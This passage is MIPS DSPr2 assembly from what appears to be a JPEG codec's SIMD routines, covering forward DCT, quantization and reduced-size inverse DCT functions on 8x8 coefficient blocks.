addu s2, s5, s4 /* tmp2 = t10 + t11 */
subu s3, s5, s4 /* tmp3 = t10 - t11 */
sll s2, s2, 2 /* tmp2 = (t10 + t11) << 2 */
sll s3, s3, 2 /* tmp3 = (t10 - t11) << 2 */
sh s2, -16(a1)
sh s3, -8(a1)
sh s0, -12(a1)
bgtz s8, 1b
sh s1, -4(a1)
li t0, 2260
li t1, 11363
li t2, 9633
li t3, 6436
li t4, 6437
li t5, 2261
li t6, 11362
li t7, 2259
li t8, 4433
li t9, 10703
li a1, 10704
li s8, 8
2:
lh a2, 0(a0) /* 0 */
lh a3, 16(a0) /* 8 */
lh v0, 32(a0) /* 16 */
lh v1, 48(a0) /* 24 */
lh s4, 64(a0) /* 32 */
lh s5, 80(a0) /* 40 */
lh s6, 96(a0) /* 48 */
lh s7, 112(a0) /* 56 */
addu s2, v0, s5 /* tmp2 = 16 + 40 */
subu s5, v0, s5 /* tmp5 = 16 - 40 */
addu s3, v1, s4 /* tmp3 = 24 + 32 */
subu s4, v1, s4 /* tmp4 = 24 - 32 */
addu s0, a2, s7 /* tmp0 = 0 + 56 */
subu s7, a2, s7 /* tmp7 = 0 - 56 */
addu s1, a3, s6 /* tmp1 = 8 + 48 */
subu s6, a3, s6 /* tmp6 = 8 - 48 */
addu a2, s0, s3 /* tmp10 = tmp0 + tmp3 */
subu v1, s0, s3 /* tmp13 = tmp0 - tmp3 */
addu a3, s1, s2 /* tmp11 = tmp1 + tmp2 */
subu v0, s1, s2 /* tmp12 = tmp1 - tmp2 */
mult s7, t1 /* ac0 = tmp7 * c1 */
madd s4, t0 /* ac0 += tmp4 * c0 */
madd s5, t4 /* ac0 += tmp5 * c4 */
madd s6, t2 /* ac0 += tmp6 * c2 */
mult $ac1, s7, t2 /* ac1 = tmp7 * c2 */
msub $ac1, s4, t3 /* ac1 -= tmp4 * c3 */
msub $ac1, s5, t6 /* ac1 -= tmp5 * c6 */
msub $ac1, s6, t7 /* ac1 -= tmp6 * c7 */
mult $ac2, s7, t4 /* ac2 = tmp7 * c4 */
madd $ac2, s4, t2 /* ac2 += tmp4 * c2 */
madd $ac2, s5, t5 /* ac2 += tmp5 * c5 */
msub $ac2, s6, t6 /* ac2 -= tmp6 * c6 */
mult $ac3, s7, t0 /* ac3 = tmp7 * c0 */
msub $ac3, s4, t1 /* ac3 -= tmp4 * c1 */
madd $ac3, s5, t2 /* ac3 += tmp5 * c2 */
msub $ac3, s6, t3 /* ac3 -= tmp6 * c3 */
extr_r.w s0, $ac0, 15 /* tmp0 = (ac0 + 16384) >> 15 */
extr_r.w s1, $ac1, 15 /* tmp1 = (ac1 + 16384) >> 15 */
extr_r.w s2, $ac2, 15 /* tmp2 = (ac2 + 16384) >> 15 */
extr_r.w s3, $ac3, 15 /* tmp3 = (ac3 + 16384) >> 15 */
addiu s8, s8, -1
addu s4, a2, a3 /* tmp4 = tmp10 + tmp11 */
subu s5, a2, a3 /* tmp5 = tmp10 - tmp11 */
sh s0, 16(a0)
sh s1, 48(a0)
sh s2, 80(a0)
sh s3, 112(a0)
mult v0, t8 /* ac0 = tmp12 * c8 */
madd v1, t9 /* ac0 += tmp13 * c9 */
mult $ac1, v1, t8 /* ac1 = tmp13 * c8 */
msub $ac1, v0, a1 /* ac1 -= tmp12 * c10 */
addiu a0, a0, 2
extr_r.w s6, $ac0, 15 /* tmp6 = (ac0 + 16384) >> 15 */
extr_r.w s7, $ac1, 15 /* tmp7 = (ac1 + 16384) >> 15 */
shra_r.w s4, s4, 2 /* tmp4 = (tmp4 + 2) >> 2 */
shra_r.w s5, s5, 2 /* tmp5 = (tmp5 + 2) >> 2 */
sh s4, -2(a0)
sh s5, 62(a0)
sh s6, 30(a0)
bgtz s8, 2b
sh s7, 94(a0)
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8
jr ra
nop
END(jsimd_fdct_islow_dspr2)
/**************************************************************************/
LEAF_DSPR2(jsimd_fdct_ifast_dspr2)
/*
* a0 = data
*/
.set at
SAVE_REGS_ON_STACK 8, s0, s1
li a1, 0x014e014e /* FIX_1_306562965 (334 << 16) |
(334 & 0xffff) */
li a2, 0x008b008b /* FIX_0_541196100 (139 << 16) |
(139 & 0xffff) */
li a3, 0x00620062 /* FIX_0_382683433 (98 << 16) |
(98 & 0xffff) */
li s1, 0x00b500b5 /* FIX_0_707106781 (181 << 16) |
(181 & 0xffff) */
move v0, a0
addiu v1, v0, 128 /* end address */
0:
lw t0, 0(v0) /* tmp0 = 1|0 */
lw t1, 4(v0) /* tmp1 = 3|2 */
lw t2, 8(v0) /* tmp2 = 5|4 */
lw t3, 12(v0) /* tmp3 = 7|6 */
packrl.ph t1, t1, t1 /* tmp1 = 2|3 */
packrl.ph t3, t3, t3 /* tmp3 = 6|7 */
subq.ph t7, t1, t2 /* tmp7 = 2-5|3-4 = t5|t4 */
subq.ph t5, t0, t3 /* tmp5 = 1-6|0-7 = t6|t7 */
addq.ph t6, t1, t2 /* tmp6 = 2+5|3+4 = t2|t3 */
addq.ph t4, t0, t3 /* tmp4 = 1+6|0+7 = t1|t0 */
addq.ph t8, t4, t6 /* tmp5 = t1+t2|t0+t3 = t11|t10 */
subq.ph t9, t4, t6 /* tmp7 = t1-t2|t0-t3 = t12|t13 */
sra t4, t8, 16 /* tmp4 = t11 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t9, s1
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, t7, a3 /* ac1 += t4*98 + t5*98 */
dpsx.w.ph $ac1, t5, a3 /* ac1 += t6*98 + t7*98 */
mult $ac2, $0, $0 /* ac2 = 0 */
dpa.w.ph $ac2, t7, a2 /* ac2 += t4*139 + t5*139 */
mult $ac3, $0, $0 /* ac3 = 0 */
dpa.w.ph $ac3, t5, a1 /* ac3 += t6*334 + t7*334 */
precrq.ph.w t0, t5, t7 /* t0 = t5|t6 */
addq.ph t2, t8, t4 /* tmp2 = t10 + t11 */
subq.ph t3, t8, t4 /* tmp3 = t10 - t11 */
extr.w t4, $ac0, 8
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t0, s1 /* ac0 += t5*181 + t6*181 */
extr.w t0, $ac1, 8 /* t0 = z5 */
extr.w t1, $ac2, 8 /* t1 = MULTIPLY(tmp10, 139) */
extr.w t7, $ac3, 8 /* t2 = MULTIPLY(tmp12, 334) */
extr.w t8, $ac0, 8 /* t8 = z3 = MULTIPLY(tmp11, 181) */
add t6, t1, t0 /* t6 = z2 */
add t7, t7, t0 /* t7 = z4 */
subq.ph t0, t5, t8 /* t0 = z13 = tmp7 - z3 */
addq.ph t8, t5, t8 /* t9 = z11 = tmp7 + z3 */
addq.ph t1, t0, t6 /* t1 = z13 + z2 */
subq.ph t6, t0, t6 /* t6 = z13 - z2 */
addq.ph t0, t8, t7 /* t0 = z11 + z4 */
subq.ph t7, t8, t7 /* t7 = z11 - z4 */
addq.ph t5, t4, t9
subq.ph t4, t9, t4
sh t2, 0(v0)
sh t5, 4(v0)
sh t3, 8(v0)
sh t4, 12(v0)
sh t1, 10(v0)
sh t6, 6(v0)
sh t0, 2(v0)
sh t7, 14(v0)
addiu v0, 16
bne v1, v0, 0b
nop
move v0, a0
addiu v1, v0, 16
1:
lh t0, 0(v0) /* 0 */
lh t1, 16(v0) /* 8 */
lh t2, 32(v0) /* 16 */
lh t3, 48(v0) /* 24 */
lh t4, 64(v0) /* 32 */
lh t5, 80(v0) /* 40 */
lh t6, 96(v0) /* 48 */
lh t7, 112(v0) /* 56 */
add t8, t0, t7 /* t8 = tmp0 */
sub t7, t0, t7 /* t7 = tmp7 */
add t0, t1, t6 /* t0 = tmp1 */
sub t1, t1, t6 /* t1 = tmp6 */
add t6, t2, t5 /* t6 = tmp2 */
sub t5, t2, t5 /* t5 = tmp5 */
add t2, t3, t4 /* t2 = tmp3 */
sub t3, t3, t4 /* t3 = tmp4 */
add t4, t8, t2 /* t4 = tmp10 = tmp0 + tmp3 */
sub t8, t8, t2 /* t8 = tmp13 = tmp0 - tmp3 */
sub s0, t0, t6 /* s0 = tmp12 = tmp1 - tmp2 */
ins t8, s0, 16, 16 /* t8 = tmp12|tmp13 */
add t2, t0, t6 /* t2 = tmp11 = tmp1 + tmp2 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t8, s1 /* ac0 += t12*181 + t13*181 */
add s0, t4, t2 /* t8 = tmp10+tmp11 */
sub t4, t4, t2 /* t4 = tmp10-tmp11 */
sh s0, 0(v0)
sh t4, 64(v0)
extr.w t2, $ac0, 8 /* z1 = MULTIPLY(tmp12+tmp13,
FIX_0_707106781) */
addq.ph t4, t8, t2 /* t9 = tmp13 + z1 */
subq.ph t8, t8, t2 /* t2 = tmp13 - z1 */
sh t4, 32(v0)
sh t8, 96(v0)
add t3, t3, t5 /* t3 = tmp10 = tmp4 + tmp5 */
add t0, t5, t1 /* t0 = tmp11 = tmp5 + tmp6 */
add t1, t1, t7 /* t1 = tmp12 = tmp6 + tmp7 */
andi t4, a1, 0xffff
mul s0, t1, t4
sra s0, s0, 8 /* s0 = z4 =
MULTIPLY(tmp12, FIX_1_306562965) */
ins t1, t3, 16, 16 /* t1 = tmp10|tmp12 */
mult $0, $0 /* ac0 = 0 */
mulsa.w.ph $ac0, t1, a3 /* ac0 += t10*98 - t12*98 */
extr.w t8, $ac0, 8 /* z5 = MULTIPLY(tmp10-tmp12,
FIX_0_382683433) */
add t2, t7, t8 /* t2 = tmp7 + z5 */
sub t7, t7, t8 /* t7 = tmp7 - z5 */
andi t4, a2, 0xffff
mul t8, t3, t4
sra t8, t8, 8 /* t8 = z2 =
MULTIPLY(tmp10, FIX_0_541196100) */
andi t4, s1, 0xffff
mul t6, t0, t4
sra t6, t6, 8 /* t6 = z3 =
MULTIPLY(tmp11, FIX_0_707106781) */
add t0, t6, t8 /* t0 = z3 + z2 */
sub t1, t6, t8 /* t1 = z3 - z2 */
add t3, t6, s0 /* t3 = z3 + z4 */
sub t4, t6, s0 /* t4 = z3 - z4 */
sub t5, t2, t1 /* t5 = dataptr[5] */
sub t6, t7, t0 /* t6 = dataptr[3] */
add t3, t2, t3 /* t3 = dataptr[1] */
add t4, t7, t4 /* t4 = dataptr[7] */
sh t5, 80(v0)
sh t6, 48(v0)
sh t3, 16(v0)
sh t4, 112(v0)
addiu v0, 2
bne v0, v1, 1b
nop
RESTORE_REGS_FROM_STACK 8, s0, s1
j ra
nop
END(jsimd_fdct_ifast_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_quantize_dspr2)
/*
* a0 = coef_block
* a1 = divisors
* a2 = workspace
*/
.set at
SAVE_REGS_ON_STACK 16, s0, s1, s2
addiu v0, a2, 124 /* v0 = workspace_end */
lh t0, 0(a2)
lh t1, 0(a1)
lh t2, 128(a1)
sra t3, t0, 15
sll t3, t3, 1
addiu t3, t3, 1
mul t0, t0, t3
lh t4, 384(a1)
lh t5, 130(a1)
lh t6, 2(a2)
lh t7, 2(a1)
lh t8, 386(a1)
1:
andi t1, 0xffff
add t9, t0, t2
andi t9, 0xffff
mul v1, t9, t1
sra s0, t6, 15
sll s0, s0, 1
addiu s0, s0, 1
addiu t9, t4, 16
srav v1, v1, t9
mul v1, v1, t3
mul t6, t6, s0
andi t7, 0xffff
addiu a2, a2, 4
addiu a1, a1, 4
add s1, t6, t5
andi s1, 0xffff
sh v1, 0(a0)
mul s2, s1, t7
addiu s1, t8, 16
srav s2, s2, s1
mul s2, s2, s0
lh t0, 0(a2)
lh t1, 0(a1)
sra t3, t0, 15
sll t3, t3, 1
addiu t3, t3, 1
mul t0, t0, t3
lh t2, 128(a1)
lh t4, 384(a1)
lh t5, 130(a1)
lh t8, 386(a1)
lh t6, 2(a2)
lh t7, 2(a1)
sh s2, 2(a0)
lh t0, 0(a2)
sra t3, t0, 15
sll t3, t3, 1
addiu t3, t3, 1
mul t0, t0, t3
bne a2, v0, 1b
addiu a0, a0, 4
andi t1, 0xffff
add t9, t0, t2
andi t9, 0xffff
mul v1, t9, t1
sra s0, t6, 15
sll s0, s0, 1
addiu s0, s0, 1
addiu t9, t4, 16
srav v1, v1, t9
mul v1, v1, t3
mul t6, t6, s0
andi t7, 0xffff
sh v1, 0(a0)
add s1, t6, t5
andi s1, 0xffff
mul s2, s1, t7
addiu s1, t8, 16
addiu a2, a2, 4
addiu a1, a1, 4
srav s2, s2, s1
mul s2, s2, s0
sh s2, 2(a0)
RESTORE_REGS_FROM_STACK 16, s0, s1, s2
j ra
nop
END(jsimd_quantize_dspr2)
#ifndef __mips_soft_float
/*****************************************************************************/
LEAF_DSPR2(jsimd_quantize_float_dspr2)
/*
* a0 = coef_block
* a1 = divisors
* a2 = workspace
*/
.set at
li t1, 0x46800100 /* integer representation 16384.5 */
mtc1 t1, f0
li t0, 63
0:
lwc1 f2, 0(a2)
lwc1 f10, 0(a1)
lwc1 f4, 4(a2)
lwc1 f12, 4(a1)
lwc1 f6, 8(a2)
lwc1 f14, 8(a1)
lwc1 f8, 12(a2)
lwc1 f16, 12(a1)
madd.s f2, f0, f2, f10
madd.s f4, f0, f4, f12
madd.s f6, f0, f6, f14
madd.s f8, f0, f8, f16
lwc1 f10, 16(a1)
lwc1 f12, 20(a1)
trunc.w.s f2, f2
trunc.w.s f4, f4
trunc.w.s f6, f6
trunc.w.s f8, f8
lwc1 f14, 24(a1)
lwc1 f16, 28(a1)
mfc1 t1, f2
mfc1 t2, f4
mfc1 t3, f6
mfc1 t4, f8
lwc1 f2, 16(a2)
lwc1 f4, 20(a2)
lwc1 f6, 24(a2)
lwc1 f8, 28(a2)
madd.s f2, f0, f2, f10
madd.s f4, f0, f4, f12
madd.s f6, f0, f6, f14
madd.s f8, f0, f8, f16
addiu t1, t1, -16384
addiu t2, t2, -16384
addiu t3, t3, -16384
addiu t4, t4, -16384
trunc.w.s f2, f2
trunc.w.s f4, f4
trunc.w.s f6, f6
trunc.w.s f8, f8
sh t1, 0(a0)
sh t2, 2(a0)
sh t3, 4(a0)
sh t4, 6(a0)
mfc1 t1, f2
mfc1 t2, f4
mfc1 t3, f6
mfc1 t4, f8
addiu t0, t0, -8
addiu a2, a2, 32
addiu a1, a1, 32
addiu t1, t1, -16384
addiu t2, t2, -16384
addiu t3, t3, -16384
addiu t4, t4, -16384
sh t1, 8(a0)
sh t2, 10(a0)
sh t3, 12(a0)
sh t4, 14(a0)
bgez t0, 0b
addiu a0, a0, 16
j ra
nop
END(jsimd_quantize_float_dspr2)
#endif
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_2x2_dspr2)
/*
* a0 = compptr->dct_table
* a1 = coef_block
* a2 = output_buf
* a3 = output_col
*/
.set at
SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4, s5
addiu sp, sp, -40
move v0, sp
addiu s2, zero, 29692
addiu s3, zero, -10426
addiu s4, zero, 6967
addiu s5, zero, -5906
lh t0, 0(a1) /* t0 = inptr[DCTSIZE*0] */
lh t5, 0(a0) /* t5 = quantptr[DCTSIZE*0] */
lh t1, 48(a1) /* t1 = inptr[DCTSIZE*3] */
lh t6, 48(a0) /* t6 = quantptr[DCTSIZE*3] */
mul t4, t5, t0
lh t0, 16(a1) /* t0 = inptr[DCTSIZE*1] */
lh t5, 16(a0) /* t5 = quantptr[DCTSIZE*1] */
mul t6, t6, t1
mul t5, t5, t0
lh t2, 80(a1) /* t2 = inptr[DCTSIZE*5] */
lh t7, 80(a0) /* t7 = quantptr[DCTSIZE*5] */
lh t3, 112(a1) /* t3 = inptr[DCTSIZE*7] */
lh t8, 112(a0) /* t8 = quantptr[DCTSIZE*7] */
mul t7, t7, t2
mult zero, zero
mul t8, t8, t3
li s0, 0x73FCD746 /* s0 = (29692 << 16) | (-10426 & 0xffff) */
li s1, 0x1B37E8EE /* s1 = (6967 << 16) | (-5906 & 0xffff) */
ins t6, t5, 16, 16 /* t6 = t5|t6 */
sll t4, t4, 15
dpa.w.ph $ac0, t6, s0
lh t1, 2(a1)
lh t6, 2(a0)
ins t8, t7, 16, 16 /* t8 = t7|t8 */
dpa.w.ph $ac0, t8, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 18(a1)
lh t6, 18(a0)
lh t2, 50(a1)
lh t7, 50(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 82(a1)
lh t2, 82(a0)
lh t3, 114(a1)
lh t4, 114(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 0(v0)
sw t8, 20(v0)
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 6(a1)
lh t6, 6(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 22(a1)
lh t6, 22(a0)
lh t2, 54(a1)
lh t7, 54(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 86(a1)
lh t2, 86(a0)
lh t3, 118(a1)
lh t4, 118(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 4(v0)
sw t8, 24(v0)
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 10(a1)
lh t6, 10(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 26(a1)
lh t6, 26(a0)
lh t2, 58(a1)
lh t7, 58(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 90(a1)
lh t2, 90(a0)
lh t3, 122(a1)
lh t4, 122(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 8(v0)
sw t8, 28(v0)
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
lh t1, 14(a1)
lh t6, 14(a0)
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
mul t5, t6, t1
lh t1, 30(a1)
lh t6, 30(a0)
lh t2, 62(a1)
lh t7, 62(a0)
mul t6, t6, t1
subu t8, t4, t0
mul t7, t7, t2
addu t0, t4, t0
shra_r.w t0, t0, 13
lh t1, 94(a1)
lh t2, 94(a0)
lh t3, 126(a1)
lh t4, 126(a0)
shra_r.w t8, t8, 13
mul t1, t1, t2
mul t3, t3, t4
sw t0, 12(v0)
sw t8, 32(v0)
sll t4, t5, 15
ins t7, t6, 16, 16
mult zero, zero
dpa.w.ph $ac0, t7, s0
ins t3, t1, 16, 16
dpa.w.ph $ac0, t3, s1
mflo t0, $ac0
lw t9, 0(a2)
lw t3, 0(v0)
lw t7, 4(v0)
lw t1, 8(v0)
addu t9, t9, a3
sll t3, t3, 15
subu t8, t4, t0
addu t0, t4, t0
shra_r.w t0, t0, 13
shra_r.w t8, t8, 13
sw t0, 16(v0)
sw t8, 36(v0)
lw t5, 12(v0)
lw t6, 16(v0)
mult t7, s2
madd t1, s3
madd t5, s4
madd t6, s5
lw t5, 24(v0)
lw t7, 28(v0)
mflo t0, $ac0
lw t8, 32(v0)
lw t2, 36(v0)
mult $ac1, t5, s2
madd $ac1, t7, s3
madd $ac1, t8, s4
madd $ac1, t2, s5
addu t1, t3, t0
subu t6, t3, t0
shra_r.w t1, t1, 20
shra_r.w t6, t6, 20
mflo t4, $ac1
shll_s.w t1, t1, 24
shll_s.w t6, t6, 24
sra t1, t1, 24
sra t6, t6, 24
addiu t1, t1, 128
addiu t6, t6, 128
lw t0, 20(v0)
sb t1, 0(t9)
sb t6, 1(t9)
sll t0, t0, 15
lw t9, 4(a2)
addu t1, t0, t4
subu t6, t0, t4
addu t9, t9, a3
shra_r.w t1, t1, 20
shra_r.w t6, t6, 20
shll_s.w t1, t1, 24
shll_s.w t6, t6, 24
sra t1, t1, 24
sra t6, t6, 24
addiu t1, t1, 128
addiu t6, t6, 128
sb t1, 0(t9)
sb t6, 1(t9)
addiu sp, sp, 40
RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4, s5
j ra
nop
END(jsimd_idct_2x2_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_4x4_dspr2)
/*
* a0 = compptr->dct_table
* a1 = coef_block
* a2 = output_buf
* a3 = output_col
* 16(sp) = workspace[DCTSIZE*4] (buffers data between passes)
*/
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
lw v1, 48(sp)
move t0, a1
move t1, v1
li t9, 4
li s0, 0x2e75f93e
li s1, 0x21f9ba79
li s2, 0xecc2efb0
li s3, 0x52031ccd
0:
lh s6, 32(t0) /* inptr[DCTSIZE*2] */
lh t6, 32(a0) /* quantptr[DCTSIZE*2] */
lh s7, 96(t0) /* inptr[DCTSIZE*6] */
lh t7, 96(a0) /* quantptr[DCTSIZE*6] */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh s4, 0(t0) /* inptr[DCTSIZE*0] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s5, 0(a0) /* quantptr[0] */
li s6, 15137
li s7, 6270
mul t2, s4, s5 /* tmp0 = (inptr[0] * quantptr[0]) */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh t5, 112(t0) /* inptr[DCTSIZE*7] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s4, 112(a0) /* quantptr[DCTSIZE*7] */
lh v0, 80(t0) /* inptr[DCTSIZE*5] */
lh s5, 80(a0) /* quantptr[DCTSIZE*5] */
lh s6, 48(a0) /* quantptr[DCTSIZE*3] */
sll t2, t2, 14 /* tmp0 <<= (CONST_BITS+1) */
lh s7, 16(a0) /* quantptr[DCTSIZE*1] */
lh t8, 16(t0) /* inptr[DCTSIZE*1] */
subu t6, t6, t7 /* tmp2 =
MULTIPLY(z2, t5) - MULTIPLY(z3, t6) */
lh t7, 48(t0) /* inptr[DCTSIZE*3] */
mul t5, s4, t5 /* z1 = (inptr[DCTSIZE*7] *
quantptr[DCTSIZE*7]) */
mul v0, s5, v0 /* z2 = (inptr[DCTSIZE*5] *
quantptr[DCTSIZE*5]) */
mul t7, s6, t7 /* z3 = (inptr[DCTSIZE*3] *
quantptr[DCTSIZE*3]) */
mul t8, s7, t8 /* z4 = (inptr[DCTSIZE*1] *
quantptr[DCTSIZE*1]) */
addu t3, t2, t6 /* tmp10 = tmp0 + z2 */
subu t4, t2, t6 /* tmp10 = tmp0 - z2 */
mult $ac0, zero, zero
mult $ac1, zero, zero
ins t5, v0, 16, 16
ins t7, t8, 16, 16
addiu t9, t9, -1
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
mflo s4, $ac0
mflo s5, $ac1
addiu a0, a0, 2
addiu t1, t1, 4
addiu t0, t0, 2
addu t6, t4, s4
subu t5, t4, s4
addu s6, t3, s5
subu s7, t3, s5
shra_r.w t6, t6, 12 /* DESCALE(tmp12 + temp1, 12) */
shra_r.w t5, t5, 12 /* DESCALE(tmp12 - temp1, 12) */
shra_r.w s6, s6, 12 /* DESCALE(tmp10 + temp2, 12) */
shra_r.w s7, s7, 12 /* DESCALE(tmp10 - temp2, 12) */
sw t6, 28(t1)
sw t5, 60(t1)
sw s6, -4(t1)
bgtz t9, 0b
sw s7, 92(t1)
/* second loop three pass */
li t9, 3
1:
lh s6, 34(t0) /* inptr[DCTSIZE*2] */
lh t6, 34(a0) /* quantptr[DCTSIZE*2] */
lh s7, 98(t0) /* inptr[DCTSIZE*6] */
lh t7, 98(a0) /* quantptr[DCTSIZE*6] */
mul t6, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh s4, 2(t0) /* inptr[DCTSIZE*0] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s5, 2(a0) /* quantptr[DCTSIZE*0] */
li s6, 15137
li s7, 6270
mul t2, s4, s5 /* tmp0 = (inptr[0] * quantptr[0]) */
mul v0, s6, t6 /* z2 = (inptr[DCTSIZE*2] *
quantptr[DCTSIZE*2]) */
lh t5, 114(t0) /* inptr[DCTSIZE*7] */
mul t7, s7, t7 /* z3 = (inptr[DCTSIZE*6] *
quantptr[DCTSIZE*6]) */
lh s4, 114(a0) /* quantptr[DCTSIZE*7] */
lh s5, 82(a0) /* quantptr[DCTSIZE*5] */
lh t6, 82(t0) /* inptr[DCTSIZE*5] */
sll t2, t2, 14 /* tmp0 <<= (CONST_BITS+1) */
lh s6, 50(a0) /* quantptr[DCTSIZE*3] */
lh t8, 18(t0) /* inptr[DCTSIZE*1] */
subu v0, v0, t7 /* tmp2 =
MULTIPLY(z2, t5) - MULTIPLY(z3, t6) */
lh t7, 50(t0) /* inptr[DCTSIZE*3] */
lh s7, 18(a0) /* quantptr[DCTSIZE*1] */
mul t5, s4, t5 /* z1 = (inptr[DCTSIZE*7] *
quantptr[DCTSIZE*7]) */
mul t6, s5, t6 /* z2 = (inptr[DCTSIZE*5] *
quantptr[DCTSIZE*5]) */
mul t7, s6, t7 /* z3 = (inptr[DCTSIZE*3] *
quantptr[DCTSIZE*3]) */
mul t8, s7, t8 /* z4 = (inptr[DCTSIZE*1] *
quantptr[DCTSIZE*1]) */
addu t3, t2, v0 /* tmp10 = tmp0 + z2 */
subu t4, t2, v0 /* tmp10 = tmp0 - z2 */
mult $ac0, zero, zero
mult $ac1, zero, zero
ins t5, t6, 16, 16
ins t7, t8, 16, 16
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
mflo t5, $ac0
mflo t6, $ac1
addiu t9, t9, -1
addiu t0, t0, 2
addiu a0, a0, 2
addiu t1, t1, 4
addu s5, t4, t5
subu s4, t4, t5
addu s6, t3, t6
subu s7, t3, t6
shra_r.w s5, s5, 12 /* DESCALE(tmp12 + temp1, 12) */
shra_r.w s4, s4, 12 /* DESCALE(tmp12 - temp1, 12) */
shra_r.w s6, s6, 12 /* DESCALE(tmp10 + temp2, 12) */
shra_r.w s7, s7, 12 /* DESCALE(tmp10 - temp2, 12) */
sw s5, 32(t1)
sw s4, 64(t1)
sw s6, 0(t1)
bgtz t9, 1b
sw s7, 96(t1)
move t1, v1
li s4, 15137
lw s6, 8(t1) /* wsptr[2] */
li s5, 6270
lw s7, 24(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 0(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 28(t1) /* wsptr[7] */
lh t6, 20(t1) /* wsptr[5] */
lh t7, 12(t1) /* wsptr[3] */
lh t8, 4(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
((JLONG)wsptr[0]) << (CONST_BITS+1) */
mflo s6, $ac0
/* MULTIPLY(wsptr[2], FIX_1_847759065) +
MULTIPLY(wsptr[6], -FIX_0_765366865) */
subu s4, s4, s5
addu t3, t2, s4 /* tmp10 = tmp0 + z2 */
mflo s7, $ac1
subu t4, t2, s4 /* tmp10 = tmp0 - z2 */
addu t7, t4, s6
subu t8, t4, s6
addu t5, t3, s7
subu t6, t3, s7
shra_r.w t5, t5, 19 /* DESCALE(tmp10 + temp2, 19) */
shra_r.w t6, t6, 19 /* DESCALE(tmp10 - temp2, 19) */
shra_r.w t7, t7, 19 /* DESCALE(tmp12 + temp1, 19) */
shra_r.w t8, t8, 19 /* DESCALE(tmp12 - temp1, 19) */
sll s4, t9, 2
lw v0, 0(a2) /* output_buf[ctr] */
shll_s.w t5, t5, 24
shll_s.w t6, t6, 24
shll_s.w t7, t7, 24
shll_s.w t8, t8, 24
sra t5, t5, 24
sra t6, t6, 24
sra t7, t7, 24
sra t8, t8, 24
addu v0, v0, a3 /* outptr = output_buf[ctr] + output_col */
addiu t5, t5, 128
addiu t6, t6, 128
addiu t7, t7, 128
addiu t8, t8, 128
sb t5, 0(v0)
sb t7, 1(v0)
sb t8, 2(v0)
sb t6, 3(v0)
/* 2 */
li s4, 15137
lw s6, 40(t1) /* wsptr[2] */
li s5, 6270
lw s7, 56(t1) /* wsptr[6] */
mul s4, s4, s6 /* MULTIPLY((JLONG)wsptr[2],
FIX_1_847759065) */
lw t2, 32(t1) /* wsptr[0] */
mul s5, s5, s7 /* MULTIPLY((JLONG)wsptr[6],
-FIX_0_765366865) */
lh t5, 60(t1) /* wsptr[7] */
lh t6, 52(t1) /* wsptr[5] */
lh t7, 44(t1) /* wsptr[3] */
lh t8, 36(t1) /* wsptr[1] */
ins t5, t6, 16, 16
ins t7, t8, 16, 16
mult $ac0, zero, zero
dpa.w.ph $ac0, t5, s0
dpa.w.ph $ac0, t7, s1
mult $ac1, zero, zero
dpa.w.ph $ac1, t5, s2
dpa.w.ph $ac1, t7, s3
sll t2, t2, 14 /* tmp0 =
